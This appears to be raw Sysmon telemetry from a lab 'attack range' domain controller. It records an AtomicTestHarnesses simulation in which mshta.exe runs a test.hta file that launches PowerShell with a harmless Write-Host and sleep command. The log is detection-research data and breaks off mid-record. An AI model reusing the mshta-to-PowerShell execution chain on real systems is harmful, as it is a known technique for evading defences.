15:59:23.757{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535B-6008-4C06-00000000A301}5212C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024381Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.757{7901BC46-535B-6008-4C06-00000000A301}52125756C:\Windows\system32\conhost.exe{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024380Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.757{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-535B-6008-4C06-00000000A301}5212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024379Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024378Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024377Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024376Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024375Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.741{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024374Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.741{7901BC46-535B-6008-4A06-00000000A301}72284112C:\Windows\System32\mshta.exe{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000024373Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.753{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta" 10341000x800000000000000024372Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.726{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024371Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.726{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024370Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.710{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024369Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.710{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024368Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.710{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024367Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.694{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024366Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.694{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024365Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.679{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024364Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.679{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024363Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.679{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024362Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.679{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024361Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.679{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024360Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.679{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024359Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000024358Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.685{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000024357Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535A-6008-4906-00000000A301}5944C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024356Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024355Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024354Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCR